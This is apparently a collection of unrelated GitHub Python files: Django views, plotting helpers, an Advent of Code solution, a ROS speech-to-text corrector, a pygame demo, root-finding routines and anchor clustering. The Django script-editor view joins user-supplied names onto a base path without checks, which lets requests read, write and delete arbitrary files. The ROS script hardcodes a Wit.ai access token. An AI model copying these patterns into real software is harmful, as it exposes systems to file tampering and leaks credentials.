isdir\n\nfrom channels import Channel, Group\nfrom django.http import HttpResponse\nfrom django.views import View\n\nfrom command.lib import parsing_scripts\nfrom command.lib.utils import file_system\nfrom command.lib.utils.decorators import forward_exception_to_http, forward_exception_to_channel, check_permission\nfrom command.lib.utils.permission import Permission\n\n\nclass ScriptTreeView(View):\n\n def get(self, request, operation, *args, **kwargs):\n method = getattr(self, operation)\n return method(request, *args, **kwargs)\n\n def post(self, request, operation, *args, **kwargs):\n method = getattr(self, operation)\n return method(request, *args, **kwargs)\n\n @staticmethod\n @forward_exception_to_http\n def get_script_names(request, *args, **kwargs):\n values = request.POST['values']\n\n comp_id = request.POST['compendium_id']\n channel_name = request.session['channel_name']\n view = request.POST['view']\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n sub_dirs = [d for d in os.listdir(base_path) if isdir(os.path.join(base_path, d))]\n all = {}\n for sub_dir in sub_dirs:\n full_path = os.path.join(base_path, sub_dir)\n onlyfiles = [{'script_name': f} for f in os.listdir(full_path) if\n isfile(os.path.join(full_path, f)) and f != '__init__.py']\n all[sub_dir] = onlyfiles\n result = all.get(values, all)\n\n return HttpResponse(json.dumps({'success': True, 'data': result}),\n content_type=\"application/json\")\n\n @staticmethod\n @forward_exception_to_http\n @check_permission(Permission.USE_PYTHON_EDITOR)\n def update_script_file(request, *args, **kwargs):\n values = json.loads(request.POST['values'])\n\n comp_id = request.POST['compendium_id']\n channel_name = request.session['channel_name']\n view = request.POST['view']\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n old_file_name = base_path + values['path']\n new_file_name = os.path.join(os.path.dirname(old_file_name), values['file_name'])\n if not new_file_name.endswith('.py'):\n new_file_name += '.py'\n os.rename(old_file_name, new_file_name)\n Group(\"compendium_\" + str(comp_id)).send({\n 'text': json.dumps({\n 'stream': view,\n 'payload': {\n 'request': {'operation': 'refresh'},\n 'data': None\n }\n })\n })\n return HttpResponse(json.dumps({'success': True}),\n content_type=\"application/json\")\n\n @staticmethod\n @forward_exception_to_http\n @check_permission(Permission.USE_PYTHON_EDITOR)\n def delete_script_file(request, *args, **kwargs):\n values = json.loads(request.POST['values'])\n\n comp_id = request.POST['compendium_id']\n channel_name = request.session['channel_name']\n view = request.POST['view']\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n full_path = base_path + values['file_name']\n os.remove(full_path)\n Group(\"compendium_\" + str(comp_id)).send({\n 'text': json.dumps({\n 'stream': view,\n 'payload': {\n 'request': {'operation': 'refresh'},\n 'data': None\n }\n })\n })\n return HttpResponse(json.dumps({'success': True}),\n content_type=\"application/json\")\n\n @staticmethod\n @forward_exception_to_http\n @check_permission(Permission.USE_PYTHON_EDITOR)\n def create_script_file(request, *args, **kwargs):\n values = json.loads(request.POST['values'])\n\n comp_id = request.POST['compendium_id']\n channel_name = request.session['channel_name']\n view = request.POST['view']\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n full_path = base_path + values['path']\n if os.path.isfile(full_path):\n full_path = os.path.dirname(full_path)\n file_name = values['file_name']\n if not file_name.endswith('.py'):\n file_name += '.py'\n full_path = os.path.join(full_path, file_name)\n open(full_path, 'a').close()\n Group(\"compendium_\" + str(comp_id)).send({\n 'text': json.dumps({\n 'stream': view,\n 'payload': {\n 'request': {'operation': 'refresh'},\n 'data': None\n }\n })\n })\n return HttpResponse(json.dumps({'success': True}),\n content_type=\"application/json\")\n\n @staticmethod\n @forward_exception_to_http\n @check_permission(Permission.USE_PYTHON_EDITOR)\n def save_script(request, *args, **kwargs):\n values = json.loads(request.POST['values'])\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n full_path = base_path + values['file_name']\n source = values['source']\n with open(full_path, 'w') as script_file:\n script_file.write(source)\n return HttpResponse(json.dumps({'success': True}),\n content_type=\"application/json\")\n\n @staticmethod\n @forward_exception_to_http\n def read_script_file(request, *args, **kwargs):\n values = json.loads(request.POST['values'])\n\n base_path = os.path.dirname(parsing_scripts.__file__)\n full_path = base_path + values['file_name']\n\n with open(full_path, 'r') as script_file:\n data = script_file.read()\n\n return HttpResponse(json.dumps({'success': True, 'data': data}),\n content_type=\"application/json\")\n\n\n @staticmethod\n @forward_exception_to_channel\n def read_script_tree(channel_name, view, request, user):\n channel = Channel(channel_name)\n\n path = os.path.dirname(parsing_scripts.__file__)\n path_hierarchy = file_system.path_hierarchy(path, base_path=path, name_filter=request['filter']) # get only subdirectories\n path_hierarchy = [d for d in path_hierarchy['children'] if not d['leaf']] # without files\n path_hierarchy.append({'leaf': True, 'path': '/README', 'text': 'README'})\n channel.send({\n 'text': json.dumps({\n 'stream': view,\n 'payload': {\n 'request': request,\n 'data': path_hierarchy\n }\n })\n })\n","repo_name":"marcomoretto/command","sub_path":"command/lib/views/script_tree_view.py","file_name":"script_tree_view.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"43954954350","text":"import seaborn as sns\nfrom matplotlib.patches import Rectangle\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Button\nimport numpy as np\n\n\ndef plot_colour_legend(input_data):\n ## NOT IN USE AT THE MOMENT, still updating\n \n #generates the colour legend for plots with unique configs <= 5\n \n #config_data should be the list of lists generated after the Omega code. Each list should be 13 length representing pressures 0 - 12, and T lists representing number of temperatures considered\n \n #this function is called inside heatmap_plot_legendonly()\n \n unique_config_names = set([item for sublist in input_data for item in sublist])\n labels_legend = list(unique_config_names)\n \n color_legend = ['blue','pink','yellow'] #hardcoded for now\n \n handles_legend = [Rectangle((0,0),1,1,color=color) for color in color_legend]\n \n return plt.legend(handles_legend,labels_legend,title='O* Coverages',loc='upper right',bbox_to_anchor=(1.1,1))\n\n\ndef heatmap_plot(config_data,T_parameters=list,P_parameters=list,colorbar_option = False):\n ##input data, config_data should be a list of T lists. Each list should be P length representing number of pressure data points, and T lists representing number of temperatures considered\n \n ## T_parameters and P_parameters are lists that contain plotting parameters, lists are used to contain them to make function inputs neater. \n \n ## colorbar_option is False by default if unique configs <= 5 (see main for logic loop). If unique configs > 5, will be set to True. This is because colorbar will only be shown if number of configs is more than 5 (a significant number). \n \n ## NOTE: this function does not use the colorbar because there are <5 unique configuration names.\n \n #Axis analyzer: determine if the plot is too tall to plot properly on matplotlib.\n ## If plot is too tall, place longer axis on x axis and plot horizontally.\n ## However, there is still a limit as to the plot size that can be handled by computer before the annotations become unreadable.\n \n #calculate the number of points for T and P axis respectively.\n T_points = len(config_data)\n P_points = len(config_data[0])\n unique_configs = len(set([item for sublist in config_data for item in sublist]))\n \n # If loop Logic\n ## whichever has more data points (T/P), that means the axis will be longer. In that case make the longer axis the x axis, adjust figure size accordingly.\n if T_points > P_points:\n data_heatmap = np.array(config_data).T[::-1] #invert due to heatmap plotting style of matplotlib\n \n fig, ax = plt.subplots(figsize = (T_points,P_points))\n\n sns.heatmap(data=data_heatmap,linecolor = 'black', linewidths=0.5, cmap='plasma',annot=True,fmt='',cbar=colorbar_option, square=True,ax=ax)\n\n #Custom colour legend settings (hardcoded for now)\n #legend = plot_colour_legend(config_data)\n \n #plt.gca().add_artist(legend)\n \n ## custom tick locations setter to avoid tick location errors. Variable names are different to avoid confusion with other plot, but the logic remains.\n ## Reasoning: As number of data points increases, matplotlib's default number of ticks are insufficient to fit our larger number of axis labels, resulting in an error returned when finer T-P/P-T plots are desired. \n \n origin_x_ticks_T = plt.gca().get_xticks()\n origin_y_ticks_P = plt.gca().get_yticks()\n custom_x_ticks_T = np.linspace(origin_x_ticks_T[0],origin_x_ticks_T[-1],T_points)\n custom_y_ticks_P = np.linspace(origin_y_ticks_P[0],origin_y_ticks_P[-1],P_points)\n \n #x and y labels/ticks & title settings\n ax.set_ylabel(\"Natural Log of Pressure Ratio of CO2/CO\")\n ax.set_yticks(custom_y_ticks_P,labels=np.linspace(P_parameters[1],P_parameters[0],P_parameters[2])) ## Pressure values are in descending order due to the way matplotlib plots the y axis.\n ax.set_xlabel(\"Temperature (K)\")\n ax.set_xticks(custom_x_ticks_T,labels=np.linspace(T_parameters[0],T_parameters[1],T_parameters[2])) \n ax.set_title(\"O* coverage concentration over T and P\") \n \n elif T_points <= P_points:\n data_heatmap = np.array(config_data)[::-1]\n\n fig, ax = plt.subplots(figsize=(P_points,T_points))\n\n sns.heatmap(data=data_heatmap,linecolor = 'black', linewidths=0.5, cmap='plasma',annot=True,fmt='',cbar=colorbar_option, square=True,ax=ax)\n\n #Custom colour legend settings (hardcoded for now)\n #legend = plot_colour_legend(config_data)\n \n #plt.gca().add_artist(legend)\n \n ## custom tick locations setter to avoid tick location errors\n \n ## Reasoning: As number of data points increases, matplotlib's default number of ticks are insufficient to fit our larger number of axis labels, resulting in an error returned when finer T-P/P-T plots are desired. \n\n origin_x_ticks = plt.gca().get_xticks()\n origin_y_ticks = plt.gca().get_yticks()\n custom_x_ticks = np.linspace(origin_x_ticks[0],origin_x_ticks[-1],P_points)\n custom_y_ticks = np.linspace(origin_y_ticks[0],origin_y_ticks[-1],T_points)\n \n #x and y labels/ticks & title settings\n ax.set_xlabel(\"Natural Log of Pressure Ratio of CO2/CO\")\n ax.set_xticks(custom_x_ticks,labels=np.linspace(P_parameters[0],P_parameters[1],P_parameters[2]))\n ax.set_ylabel(\"Temperature (K)\")\n ax.set_yticks(custom_y_ticks,labels=np.linspace(T_parameters[1],T_parameters[0],T_parameters[2])) ## Temperature values are in descending order due to the way matplotlib plots the y axis.\n ax.set_title(\"O* coverage concentration over T and P\")\n\n \n plt.tight_layout()\n plt.show()","repo_name":"tituslje/Python_Mini_Showcases","sub_path":"Computational_Catalysis_Research/python src/heatmap_plot_funcs_V3_inprog.py","file_name":"heatmap_plot_funcs_V3_inprog.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"9342934241","text":"import unittest\nimport common.HTMLTestRunner_cn as Runner\n\ncasePath = \"./case\"\nrule = \"test_*.py\"\n\ndiscover = unittest.defaultTestLoader.discover(start_dir=casePath, pattern=rule)\nprint(discover)\n\nwith open(\"report.html\", \"wb\") as f:\n runner = Runner.HTMLTestRunner(stream=f, title=\"报告名\", description=\"报告描述\", retry=1)\n runner.run(discover)\n","repo_name":"hyy784022927/test-selenium","sub_path":"Auto_web/run_all.py","file_name":"run_all.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17147608784","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Album\nfrom .forms import AlbumForm\n\n# Create your views here.\n\n\ndef list_albums(request):\n albums = Album.objects.all()\n # goes to the DataBase and gets all instznces of the\n # model Album (Django ORM) = query\n return render(request, 'albums/index.html', {'albums': albums})\n # pass data to the template using the context dictionary\n\n\n# def get_album_by_priority(request, priority):\n# albums = Album.objects.filter(priority=priority)\n# return render(request, 'albums/index.html', {'albums': albums})\n\n\ndef add_album(request):\n if request.method == 'POST':\n album_form = AlbumForm(request.POST, request.FILES)\n if album_form.is_valid():\n album_form.save()\n return redirect('home')\n form = AlbumForm()\n return render(request, 'albums/add_album.html', {'form': form})\n\n\ndef detail_album(request, pk):\n album = get_object_or_404(Album, pk=pk)\n return render(request, 'albums/detail_album.html', {'album': album})\n\n\ndef edit_album(request, pk):\n albums = get_object_or_404(Album, pk=pk)\n if request.method == 'POST':\n album_form = AlbumForm(request.POST, request.FILES, instance=albums)\n if album_form.is_valid():\n album_form.save()\n return redirect('home')\n form = AlbumForm(instance=albums)\n return render(request, 'albums/edit_album.html', {'form': form, 'pk': pk})\n\n\ndef delete_album(request, pk):\n album = get_object_or_404(Album, pk=pk)\n if request.method == 'POST':\n album.delete()\n return redirect('home')\n return render(request, 'albums/delete_album.html')\n","repo_name":"Momentum-Team-17/django-music-MichaelGreason","sub_path":"albums/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36489701388","text":"f = open(\"15/input.txt\", \"r\")\nmaxX = 0\nmaxY = 0\nminX = 0\nminY = 0\nsensors = []\nbeacons = []\nfor line in f:\n line = line.strip().split(\" \")\n sX = int(line[2].replace(\",\",\"\").split(\"=\")[1])\n sY = int(line[3].replace(\":\",\"\").split(\"=\")[1])\n bX = int(line[8].replace(\",\",\"\").split(\"=\")[1])\n bY = int(line[9].replace(\",\",\"\").split(\"=\")[1])\n distance = abs(bX - sX) + abs(bY - sY)\n sensors.append((sX,sY, distance))\n if (bX,bY) not in beacons:\n beacons.append((bX,bY))\n maxX = max([maxX, sX, bX])\n maxY = max([maxY, sY, bY])\n minX = min([minX, sX, bX])\n minY = min([minY, sY, bY])\n\n\nprint(\"sensors\", len(sensors))\n\ndef getInRow(Y):\n inRow = []\n for b in beacons:\n (x, y) = b\n if y == Y:\n inRow.append((x,y))\n return inRow\n\ndef getCheckSensors(Y):\n checkSensors = []\n for s in sensors:\n (x,y,d) = s\n distance = abs(y - Y)\n if distance <= d:\n checkSensors.append(s)\n return checkSensors\n\n# part 1\ndef countImpossiblePositions(Y):\n inRow = getInRow()\n checkSensors = getCheckSensors()\n positions = 0\n for s in checkSensors:\n (x,y,d) = s\n minX = min(minX,x - d)\n maxX = max(maxX,x + d)\n\n for X in range(minX, maxX + 1):\n if (X,Y) in inRow:\n continue\n for sensor in checkSensors:\n (x,y,d) = sensor\n distance = abs(X - x) + abs(Y - y)\n if distance <= d:\n positions +=1\n break\n return positions\n\n# part2\nsearchRange = 4000000\ndef limitSearchRange():\n minX = searchRange\n minY = searchRange\n maxX = 0\n maxY = 0\n for s in sensors:\n (x, y, d) = s\n maxX = max(maxX, x)\n maxY = max(maxY, y)\n minX = min(minX, x)\n minY = min(minY, y)\n #return (minX, minY, maxX, maxY)\n return (0, 0, 4000000, 4000000)\n\ndef findBeacon():\n (minX, minY, maxX, maxY) = limitSearchRange()\n print(\"range\", minX, maxX,minY, maxY)\n for Y in range(minY, maxY + 1):\n checkSensors = getCheckSensors(Y)\n inRow = getInRow(Y)\n # print(\"checkSensors\", len(checkSensors))\n # print(\"inRow\", len(inRow))\n X = minX\n\n if Y % 100000 == 0:\n print(Y)\n\n while X < maxX + 1:\n if (X,Y) in inRow:\n continue\n detected = False\n for sensor in checkSensors:\n (x,y,d) = sensor\n distance = abs(X - x) + abs(Y - y)\n if distance <= d:\n detected = True\n #print(X, Y, sensor, distance)\n #print((x - X))\n #print(\"before\", abs(x - X) * 2, d - distance)\n X = X + abs(x - X) * 2 + abs(d - distance)\n #print(\"after\", X)\n break\n if detected == False:\n return (X, Y)\n X = X + 1\n return None\ndetectedBeacon = findBeacon()\n\nprint(\"detected\", detectedBeacon)\nprint(detectedBeacon[0]* 4000000 + detectedBeacon[1] )\n\n# 4399906","repo_name":"nguyenlinhlinh/adventofcode-2022","sub_path":"15/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28943382517","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom wit import Wit\n\nimport sys\nimport rospy\nfrom std_msgs.msg import String\n\naccess_token = 'BMYORVSUUOLBANBF6OMPVJUBC2DCAR2J'\n\nif len(sys.argv) == 2:\n\taccess_token = sys.argv[1]\n\ndef send(request, response):\n print(response['text'])\n\nactions = {\n 'send': send,\n } \n\nclient = Wit(access_token=access_token, actions=actions)\n\nwith open(\"recognized_input.doc\") as f:\n\tdata = f.read()\npossible_inputs = data.splitlines()\nwill_pub = True\n\nclass Speech_Corrector:\n\n\tdef __init__(self):\n\t\tself.text_sub = rospy.Subscriber(\"/wit/init_text\", String, self.callback)\n\t\tself.text_pub = rospy.Publisher('wit/final_text', String, queue_size = 1)\n\n\tdef callback(self, data): #assumes only one part is given, only one location is given\n\t\twords = data\n\t\tdata = str(data).split()[1:]\n\t\tprint(data)\n\n\t\tif 'rooms' in data:\n\t\t\tdata[data.index('rooms')] = str('room')\n\n\t\tmess = client.message(str(words))\n\t\tprint(\"Recieved this message: \" + str(mess))\n\n\t\timportant_info = mess['entities']\n\n\t\tif len(important_info) != 0:\n\t\t\tfor entity in important_info:\n\t\t\t\tprint(entity + \": \" + str(important_info[entity][0]['value']))\n\n\t\t\tpercentage_dict = {}\n\t\t\tfor line in possible_inputs:\n\t\t\t\tmatching = 0\n\t\t\t\tline = line.split()\n\t\t\t\tfor word in line:\n\t\t\t\t\tif word in data:\n\t\t\t\t\t\tmatching += 1\n\t\t\t\t\telif word == \"ROOM\" and 'room' in important_info:\n\t\t\t\t\t\tmatching += 1\n\t\t\t\t\telif word == \"COLOR\" and 'color' in important_info:\n\t\t\t\t\t\tmatching += 1\n\t\t\t\tif (matching/max([len(data), len(line)])) in percentage_dict:\n\t\t\t\t\tpercentage_dict[(matching/max([len(data), len(line)]))].append(line)\n\t\t\t\telse:\n\t\t\t\t\tpercentage_dict[(matching/max([len(data), len(line)]))] = [line]\n\n\t\t\tmax_percent = -1\n\t\t\tmax_percent_val = None\n\t\t\tfor key in percentage_dict:\n\t\t\t\tif key > max_percent:\n\t\t\t\t\tmax_percent = key\n\t\t\t\t\tmax_percent_val = percentage_dict[key][0]\n\n\t\t\tfor i in range(len(max_percent_val)):\n\t\t\t\tword = max_percent_val[i]\n\t\t\t\tif word == \"ROOM\":\n\t\t\t\t\ttry:\n\t\t\t\t\t\tmax_percent_val[i] = str(important_info['room'][0]['value'])\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\tprint(\"Didn't quite understand...Can you try again\")\n\t\t\t\t\t\twill_pub = False\n\t\t\t\t\t\tbreak\n\t\t\t\telif word == \"COLOR\":\n\t\t\t\t\ttry:\n\t\t\t\t\t\tmax_percent_val[i] = str(important_info['color'][0]['value'])\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\tprint(\"Didn't quite understand...Can you try again\")\n\t\t\t\t\t\twill_pub = False\n\t\t\t\t\t\tbreak\n\n\t\t\tif will_pub:\n\t\t\t\tprint(max_percent_val)\n\t\t\t\tself.text_pub.publish(' '.join(max_percent_val))\n\t\telse:\n\t\t\tprint(\"Didn't quite understand...Can you try again\")\n\t\t\t#self.text_pub.publish(' '.join(data))\n\n\ndef main(args):\n corrector = Speech_Corrector()\n rospy.init_node(\"speech_corrector\", anonymous=True)\n\n rospy.spin()\n\nif __name__ == '__main__':\n main(sys.argv)\n\n","repo_name":"brookssj/wit-speech-to-text","sub_path":"speech_to_text_corrector.py","file_name":"speech_to_text_corrector.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6875458967","text":"import pygame\nfrom button import Button\n\n# create display window\nSCREEN_HEIGHT = 500\nSCREEN_WIDTH = 800\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption('Button Demo')\n\n# load button images\nstart_img = pygame.image.load('button_frame_1.png').convert_alpha()\nclicked_img = pygame.image.load('button_frame_1_clicked.png').convert_alpha()\n\n\n# create buttons\nstart_button = Button(100, 200, start_img, 0.8)\nclicked_button = Button(450, 200, start_img, 0.8)\n\nrun = True\nwhile run:\n\n screen.fill((202, 228, 241))\n\n if start_button.draw(screen):\n start_button.raw_image = clicked_img\n print('clicked 1')\n if clicked_button.draw(screen):\n print('clicked 2')\n\n # event handler\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n pygame.display.update()\npygame.quit()\n\n\n\n","repo_name":"LarsCD/Pygame-RPG","sub_path":"Pygame_Tutorials/pygame_gui_test.py","file_name":"pygame_gui_test.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"16224911814","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#################\n# ALGORITHMS #\n#################\n\ndef bisek(f, a, b, tol=1e-12, n=0):\n \"\"\"\n RECURSIVE\n\n Parameters\n ==========\n f : callable, function to find roots of\n a, b: intervall, in which to search\n tol : convergence tolerance\n n : number steps\n\n Returns\n =======\n a : left border of intervall (in case of convergence, a and b are\n close together)\n n : steps until result\n\n \"\"\"\n # if abs(f(a)) < tol or abs(f(b)) < tol:\n if abs(a-b) < tol or abs(min(f(a), f(b))) < tol:\n return a, n\n c = (a + b) / 2\n if np.sign(f(a)) == np.sign(f(c)):\n return bisek(f, c, b, tol, n+1)\n else:\n return bisek(f, a, c, tol, n+1)\n\n\ndef sekant(f, xn, xm, tol=1e-12, n=0):\n \"\"\"\n RECURSIVE\n\n Parameters\n ==========\n f : callable, function to find roots of\n xn : x_n (start with x_1)\n xm : x_n-1 (start with x_0)\n tol : tolerance\n n : number of steps\n\n Returns\n =======\n xn : root\n n : steps until result\n\n \"\"\"\n return (xn, n) if abs(xn-xm) < tol or abs(f(xn)) < tol \\\n else sekant(f, xn - (xn - xm) / (f(xn) - f(xm)) * f(xn), xn, tol, n+1)\n\n\ndef regula_falsi(f, a, b, tol=1e-12, n=0):\n \"\"\"\n RECURSIVE, not opimized\n\n Parameters\n ==========\n f : callable, function to find roots of\n a, b: intervall in which to search\n tol : tolerance\n n : number of steps\n\n Returns\n =======\n a : left border of interval (approx. of root)\n n : number of steps\n\n \"\"\"\n if abs(a-b) < tol or abs(f(a)) < tol:\n return a, n\n c = (a*f(b) - b*f(a)) / (f(b) - f(a))\n if np.sign(f(a)) == np.sign(f(c)):\n return regula_falsi(f, c, b, tol, n+1)\n else:\n return regula_falsi(f, a, c, tol, n+1)\n\n\ndef newton(f, df, x, tol=1e-12, n=0):\n \"\"\"\n RECURSIVE\n\n Parameters\n ==========\n f : callable, function\n df : callable, derivative of f\n x : initial value\n tol : tolerance\n n : number of steps\n\n Returns\n =======\n x : root of f\n n : number of steps\n\n \"\"\"\n xn = x - f(x) / df(x)\n return (xn, n+1) if abs(x-xn) < tol or abs(f(xn)) < tol \\\n else newton(f, df, xn, tol, n+1)\n\n\n#########\n# TEST #\n#########\n\nx = np.linspace(0, 4)\nFUNCS = {\n r'$cos(x)$' : (np.cos, lambda x: -np.sin(x)),\n r'$-\\frac{x^2}{2}+3$' : (lambda x: -x**2/2+3, lambda x: -x),\n r'$-x^2 e^{-x}+0.3$' : (lambda x: -x**2*np.exp(-x)+.3, lambda x: \\\n (x**2-2*x)*np.exp(-x)),\n r'$sin(x)^3$' : (lambda x: np.sin(x)**3, lambda x: \\\n 3*np.sin(x)**2*np.cos(x)),\n}\n\nRESULTS = [\n lambda func: '\\tbisek: \\t\\t %f, %d' % bisek(func, 0.5, 3.5),\n lambda func: '\\tsekant: \\t %f, %d' % sekant(func, 0.5, 3.5),\n lambda func: '\\tregula falsi: \\t %f, %d' % regula_falsi(func, 0.5, 3.5),\n lambda func, df: '\\tnewton: \\t %f, %d' % newton(func, df, 1),\n]\n\ndef test():\n [plt.plot(x, f[0](x), label=n) for n, f in FUNCS.items()]\n plt.legend()\n\n print('roots, number of steps:')\n for name, funcs in FUNCS.items():\n func, df = funcs\n print(name)\n for res in RESULTS[:-1]:\n try:\n print(res(func))\n except RecursionError:\n print('\\nNO CONVERGENCE!\\n')\n try:\n print(RESULTS[-1](func, df))\n except RecursionError:\n print('\\nNO CONVERGENCE!\\n')\n print('\\n')\n\n\ntest()\n","repo_name":"jerluebke/comp_phys","sub_path":"1st_exercise/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"21721305353","text":"# Zapytaj użytkownika o tekst\n# Zapytaj użytkownika o szerokość\n# Wyświetl tekst który będzie mial same duze litery\n# Tekst powinien byc wycentrowany - zgodnie z wartoscia szerokosci\n\nnapis = input(\"Podaj napis: \")\nwidth = int(input(\"Podaj szerokosc: \"))\n\nprint(f\"!{napis.center(width)}!\")\n\n\n","repo_name":"katebartnik/pythonalx","sub_path":"Zadania/zadanie_2.py","file_name":"zadanie_2.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43069048513","text":"from PyQt5 import QtWidgets\n\nfrom lib.ui.prefs import Ui_Prefs\nimport functools\n\nclass PrefsWindow(QtWidgets.QWidget, Ui_Prefs):\n def __init__(self, parent=None,config=None,config_path=None):\n super(PrefsWindow, self).__init__(parent)\n self.setupUi(self)\n\n self.config = config\n self.config_path = config_path\n\n self.btnClose.clicked.connect(self.close_window)\n self.optBoolTooltips.clicked.connect(functools.partial(self.update_prefs, 'optBoolTooltips'))\n self.optBoolMinimized.clicked.connect(functools.partial(self.update_prefs, 'optBoolMinimized'))\n self.leStationsJSON.textEdited.connect(functools.partial(self.update_prefs, 'leStationJSON'))\n self.leFavsJSON.textEdited.connect(functools.partial(self.update_prefs, 'leFavsJSON'))\n\n def close_window(self):\n self.save_prefs()\n self.close()\n\n def load_prefs(self):\n self.optBoolMinimized.setChecked(self.config.getboolean('DEFAULT','optBoolMinimized'))\n self.optBoolTooltips.setChecked(self.config.getboolean('DEFAULT','optBoolTooltips'))\n self.leStationsJSON.setText(self.config['PATHS']['leStationJSON'])\n self.leFavsJSON.setText(self.config['PATHS']['leFavsJSON'])\n\n def update_prefs(self,field,data):\n print(f\"field = {field} data = {data}\")\n\n if field == 'optBoolTooltips':\n if data:\n self.config['DEFAULT']['optBoolTooltips'] = 'True'\n else:\n self.config['DEFAULT']['optBoolTooltips'] = 'False'\n\n if field == 'optBoolMinimized':\n if data:\n self.config['DEFAULT']['optBoolMinimized'] = 'True'\n else:\n self.config['DEFAULT']['optBoolMinimized'] = 'False'\n\n if field == 'leStationJSON':\n self.config['PATHS']['leStationJSON'] = data\n\n if field == 'leFavsJSON':\n self.config['PATHS']['leFavsJSON'] = data\n\n def save_prefs(self):\n with open(self.config_path, 'w') as configfile:\n self.config.write(configfile)\n","repo_name":"jampola/radioqt","sub_path":"prefs_window.py","file_name":"prefs_window.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72880890804","text":"import os\nimport pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\n\n\ndata_dict_address = \"imagenet_vid_train.pkl\"\nvalidation_dict_address = 'imagenet_vid_val.pkl'\n\ntrain_data_information = pickle.load(open(data_dict_address, \"rb\"))\nvalidation_data_information = pickle.load(open(validation_dict_address, \"rb\"))\n\nall_data_information = train_data_information + validation_data_information\n\nimage_size = 320\nmin_ignore_area = 12.\nmin_ignore_ratio = 1. / 5.\nmax_ignore_ratio = 5.0\nratio_per_area = [3, 5, 5]\nscales_per_featuremap = 3\nareas = []\nfor address, label, augment_type in all_data_information:\n for bbox in label:\n if bbox[2] == 0. or bbox[3] == 0.:\n print(address)\n print(bbox)\n ratio = (bbox[2] * image_size) / (bbox[3] * image_size)\n area = np.sqrt((bbox[2] * image_size) * (bbox[3] * image_size))\n if area < min_ignore_area or ratio < min_ignore_ratio or ratio > max_ignore_ratio:\n continue\n areas.append([area])\n\nareas_array = np.array(areas)\n\nkmeans = KMeans(n_clusters=len(ratio_per_area) * scales_per_featuremap, n_init=30, max_iter=2000, random_state=20).fit(areas_array)\nareas_list = list(np.sort(kmeans.cluster_centers_[:, 0]))\nprint(\"----------------------\")\nprint(areas_list)\nprint(areas_list[::scales_per_featuremap])\nprint(\"----------------------\")\n\nscales = []\nfor idx, area in enumerate(areas_list):\n if idx % scales_per_featuremap == 0:\n if scales_per_featuremap == 1:\n scales.append([1.])\n if scales_per_featuremap == 2:\n scales.append([1., round(areas_list[idx + 1] / areas_list[idx], 3)])\n if scales_per_featuremap == 3:\n scales.append([1., round(areas_list[idx + 1] / areas_list[idx], 3), round(areas_list[idx + 2] / areas_list[idx], 3)])\n \nprint(scales)\nprint(\"----------------------\")\n\narea_thresholds = []\nfor idx, area in enumerate(areas_list):\n if idx % scales_per_featuremap == 0 and idx > 0:\n area_thresholds.append((areas_list[idx - 1] + areas_list[idx]) / 2)\n \nprint(area_thresholds)\nprint(\"----------------------\")\n\nratios = []\nfor i in range(len(ratio_per_area)):\n ratios.append([])\n \nfor address, label, augment_type in all_data_information:\n for bbox in label:\n ratio = (bbox[2] * image_size) / (bbox[3] * image_size)\n area = np.sqrt((bbox[2] * image_size) * (bbox[3] * image_size))\n if area < min_ignore_area or ratio < min_ignore_ratio or ratio > max_ignore_ratio:\n continue\n \n for index, at in enumerate(area_thresholds):\n if area < at:\n ratios[index].append([((bbox[2] * image_size) / (bbox[3] * image_size))])\n if area > area_thresholds[-1]:\n ratios[-1].append([((bbox[2] * image_size) / (bbox[3] * image_size))])\n\n# print(np.shape(ratios))\naspect_ratios = []\nfor idx, ratio in enumerate(ratios):\n ratio = np.array(ratio)\n print(np.mean(ratio), np.max(ratio), np.min(ratio))\n print(ratio.shape)\n kmeans = KMeans(n_clusters=ratio_per_area[idx], n_init=30, max_iter=2000, random_state=20).fit(ratio)\n aspect_ratio = list(np.sort(kmeans.cluster_centers_[:, 0]))\n aspect_ratios.append(list(np.round(aspect_ratio, 3)))\n\nprint(\"----------------------\")\nprint(aspect_ratios)\nprint(\"----------------------\")\n\nprint(\"++++++++++++++++++++++++\")\nprint(list(np.round(areas_list[::scales_per_featuremap], 3)))\nprint(scales)\nprint(aspect_ratios)\n\n\n# cluster_centers_areas = 